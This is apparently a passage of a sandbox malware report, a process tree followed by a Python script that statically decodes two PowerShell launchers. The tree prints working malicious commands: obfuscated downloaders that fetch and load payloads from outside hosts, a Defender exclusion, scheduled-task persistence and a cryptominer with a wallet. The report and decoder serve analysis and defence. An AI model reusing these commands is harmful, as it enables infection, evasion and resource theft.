                                            PID:7240
                                            • C:\Windows\system32\attrib.exe
                                              attrib +h +s C:\Users\Admin\AppData\Local\Temp\10301650101\50KfF6O.exe
                                              8⤵
                                              • Views/modifies file attributes
                                              PID:7472
                                            • C:\Windows\system32\attrib.exe
                                              attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                              8⤵
                                              • Views/modifies file attributes
                                              PID:7604
                                          • C:\Users\Admin\AppData\Local\Temp\10301660101\k3t05Da.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10301660101\k3t05Da.exe"
                                            7⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Checks whether UAC is enabled
                                            • Suspicious use of SetThreadContext
                                            • System Location Discovery: System Language Discovery
                                            PID:8272
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\File.bat" "
                                              8⤵
                                              • Drops startup file
                                              • System Location Discovery: System Language Discovery
                                              PID:11816
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cDovLzE5Ni4yNTEuOTEuNDIvdXAvdXBsb2Fkcy9lbmNyeXB0aW9uMDIuanBn'; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('httpss.myvnc.com', '1907');"
                                                9⤵
                                                • Blocklisted process makes network request
                                                • Command and Scripting Interpreter: PowerShell
                                                • System Location Discovery: System Language Discovery
                                                PID:4396
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ohbuGGy.exe"
                                              8⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • System Location Discovery: System Language Discovery
                                              PID:11920
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ohbuGGy" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE327.tmp"
                                              8⤵
                                              • System Location Discovery: System Language Discovery
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:11952
                                            • C:\Users\Admin\AppData\Local\Temp\10301660101\k3t05Da.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10301660101\k3t05Da.exe"
                                              8⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              PID:2540
                                          • C:\Users\Admin\AppData\Local\Temp\10301670101\XEh4XP0.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10301670101\XEh4XP0.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:9012
                                          • C:\Users\Admin\AppData\Local\Temp\10301680101\XEh4XP0.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10301680101\XEh4XP0.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            PID:9588
                                          • C:\Users\Admin\AppData\Local\Temp\10301690101\FdqlBTs.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10301690101\FdqlBTs.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            • Adds Run key to start application
                                            PID:11924
                                            • C:\Windows\SYSTEM32\cmd.exe
                                              cmd.exe /c 1.bat && 2.js
                                              8⤵
                                              • Checks computer location settings
                                              • Modifies registry class
                                              PID:11948
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic cpu get name
                                                9⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:8716
                                              • C:\Windows\system32\find.exe
                                                find "QEMU"
                                                9⤵
                                                  PID:8724
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@
@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@
@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@HQ@e@B0@C4@a@Bh@GE@a@Bn@GQ@Yw@v@HM@ZQBn@GE@bQBp@C8@bgBp@C4@bwBj@C4@aQBh@GQ@bgB1@Hk@a@Br@Gk@b@Bh@HY@aQBo@HM@Lw@v@Do@cw@n@Cw@I@@n@D@@Jw@s@C@@JwBT@HQ@YQBy@HQ@dQBw@E4@YQBt@GU@Jw@s@C@@JwBS@GU@ZwBB@HM@bQ@n@Cw@I@@n@D@@Jw@p@Ck@fQB9@@==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($dosigo.replace('@','A')));powershell.exe $OWjuxD"
                                                  9⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  PID:9148
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.haahgdc/segami/ni.oc.iadnuyhkilavihs//:s', '0', 'StartupName', 'RegAsm', '0'))}}"
                                                    10⤵
                                                    • Blocklisted process makes network request
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious use of SetThreadContext
                                                    PID:9544
                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                      11⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:12624
                                                • C:\Windows\System32\WScript.exe
                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2.js"
                                                  9⤵
                                                    PID:12856
                                         • C:\Users\Admin\AppData\Local\Temp\10301700101\659c4db84b.exe
                                           "C:\Users\Admin\AppData\Local\Temp\10301700101\659c4db84b.exe"
                                           7⤵
                                           • Executes dropped EXE
                                           • Suspicious use of SetThreadContext
                                           PID:11764
                                           • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                             "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                             8⤵
                                               PID:12132
                                           • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                             "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                             8⤵
                                             • System Location Discovery: System Language Discovery
                                             PID:12144
                               • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
                                 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe --algo rx/0 -o 104.245.241.161:49301 -u 49GhWH3rjFtLzNT3yUhfEpYXQHgLTmtauRZJT6wXP37CJXYVkai8Ya1NQdoHtjHAPH59YDnKBLrVRRRjYXw71NRn6Sn97NJ.Worker_CPU -p x --cpu-max-threads-hint=50 -k
                                 2⤵
                                 • Suspicious use of FindShellTrayWindow
                                 PID:9780
                             • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                               "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                               1⤵
                                 PID:1676
                             • C:\Windows\system32\svchost.exe
                               C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                               1⤵
                                 PID:3516
                             • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                               "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                               1⤵
                                 PID:4028
                             • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                               C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                               1⤵
                               • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                               • Checks BIOS information in registry
                               • Executes dropped EXE
                               • Identifies Wine through registry keys
                               • Suspicious use of NtSetInformationThreadHideFromDebugger
                               • Suspicious behavior: EnumeratesProcesses
                               PID:2172
                             • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                               powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc 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
                               1⤵
                               • Command and Scripting Interpreter: PowerShell
                               • Suspicious behavior: EnumeratesProcesses
                               • Suspicious use of AdjustPrivilegeToken
                               PID:4012
                             • C:\Users\Admin\AppData\Roaming\TypeId\Attributes.exe
                               C:\Users\Admin\AppData\Roaming\TypeId\Attributes.exe
                               1⤵
                               • Executes dropped EXE
                               • Suspicious use of SetThreadContext
                               • Suspicious use of AdjustPrivilegeToken
                               PID:8672
                               • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                 2⤵
                                 • Suspicious use of NtCreateUserProcessOtherParentProcess
                                 • Suspicious use of SetThreadContext
                                 PID:9036
                             • C:\Windows\SysWOW64\WerFault.exe
                               C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 9420 -ip 9420
                               1⤵
                                 PID:5516
                             • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                               C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                               1⤵
                               • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                               • Checks BIOS information in registry
                               • Executes dropped EXE
                               • Identifies Wine through registry keys
                               • Suspicious use of NtSetInformationThreadHideFromDebugger
                               PID:12796
                             • C:\Windows\system32\conhost.exe
                               conhost --headless powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)
                               1⤵
                               • Process spawned unexpected child process
                               PID:3540
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)
                                                2⤵
                                                • Blocklisted process makes network request
                                                • Command and Scripting Interpreter: PowerShell
                                                PID:4028
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAEQALQBtAFAAUAByAGUARgBlAHIARQBuAGMAZQAgAC0ARQBYAEMATAB1AFMASQBvAG4AcAByAE8AYwBlAFMAcwAgAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUAIAAtAEYATwBSAGMARQA=
                                              1⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              PID:8980
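
Both PowerShell launchers in the tree above can be decoded statically: the `-enc` payload of PID 8980 is base64 over UTF-16LE text, and the command that `conhost.exe --headless` hands to PID 4028 hides its string as an integer array (each element minus 5570 is a character code), builds the `curl` alias from `c$('ur')l`, and spells the dot-invoked verb with `[char]` arithmetic plus `'e'+'x'`. The Python below is an added example, not part of the sandbox report or of the malware: the two command lines are quoted verbatim from the tree, while the helper names and the parsing regexes are my own. It reproduces the scripts' own transforms and never executes anything.

```python
"""Added example (not part of the sandbox report): statically decode the two
PowerShell launchers recorded in the process tree (PIDs 8980 and 4028).
The command lines are copied verbatim from the report; every transform below
mirrors what the script itself does at run time, without running it."""
import ast
import base64
import operator
import re

# PID 8980 command line, verbatim from the report.
ENC_CMDLINE = (
    "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc "
    "QQBkAEQALQBtAFAAUAByAGUARgBlAHIARQBuAGMAZQAgAC0ARQBYAEMATAB1AFMASQBvAG4AcAByAE8AYwBl"
    "AFMAcwAgAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUAIAAtAEYATwBSAGMARQA="
)

# PID 4028 command line (child of conhost.exe --headless), verbatim from the report.
OBF_CMDLINE = (
    "powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;"
    "$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,"
    "5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,"
    "5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;"
    "foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;"
    "$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr;"
    " $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;"
    ".$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)"
)

# Defender tampering: Add-MpPreference with any -Exclusion* parameter.
DEFENDER_EXCLUSION = re.compile(r"add-mppreference\s+-exclusion", re.I)


def find_encoded_payload(cmdline):
    """Return the base64 after -EncodedCommand, or None. powershell.exe accepts any
    unambiguous prefix of the switch (-e, -ec, -enc, ...), so match on prefix."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        if tok[:1] in "-/" and len(tok) > 1 and "encodedcommand".startswith(tok[1:].lower()):
            return toks[i + 1]
    return None


def analyse_encoded_launcher(cmdline):
    """Decode -enc (always UTF-16LE) and flag Defender exclusion changes."""
    payload = find_encoded_payload(cmdline)
    if payload is None:
        raise ValueError("no -EncodedCommand payload")
    script = base64.b64decode(payload).decode("utf-16-le")
    return {"script": script, "defender_exclusion": bool(DEFENDER_EXCLUSION.search(script))}


def _int_expr(expr):
    """Evaluate a parenthesised integer expression with + - * only (no eval())."""
    ops = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}

    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in ops:
            return ops[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError("unsupported expression")

    return walk(ast.parse(expr, mode="eval"))


def analyse_char_array_launcher(cmdline):
    """Undo the integer-array / alias / [char]-arithmetic obfuscation."""
    variables = dict(re.findall(r"\$(\w+)='([^']*)'", cmdline))
    # set-alias <name> c$($var)l  ->  expand $($var) from the string literals seen.
    alias_name, alias_target = re.search(r"set-alias\s+(\w+)\s+([^;\s]+)", cmdline, re.I).groups()
    alias_target = re.sub(r"\$\(\$(\w+)\)", lambda m: variables.get(m.group(1), m.group(0)), alias_target)
    # Integer array + the constant subtracted inside [char](...)  ->  hidden string.
    codes = [int(c) for c in re.search(r"\(((?:\d+,)+\d+)\)", cmdline).group(1).split(",")]
    key = int(re.search(r"\[char\]\(\$\w+-(\d+)\)", cmdline).group(1))
    hidden = "".join(chr(c - key) for c in codes)
    # .$([char](<arithmetic>)+'e'+'x')  ->  name of the dot-invoked cmdlet.
    m = re.search(r"\[char\]\(([\d\s()+\-*]+)\)\+'(\w)'\+'(\w)'", cmdline)
    verb = chr(_int_expr(m.group(1))) + m.group(2) + m.group(3)
    return {
        "alias": alias_name,
        "alias_target": alias_target,  # in Windows PowerShell 5.1, curl is an alias of Invoke-WebRequest
        "url": hidden,
        "invoke": verb,
        # -useb is an unambiguous prefix of -UseBasicParsing
        "reconstructed": f"{verb} ({alias_target} -UseBasicParsing {hidden})",
    }


if __name__ == "__main__":
    print("PID 8980:", analyse_encoded_launcher(ENC_CMDLINE))
    print("PID 4028:", analyse_char_array_launcher(OBF_CMDLINE))
```

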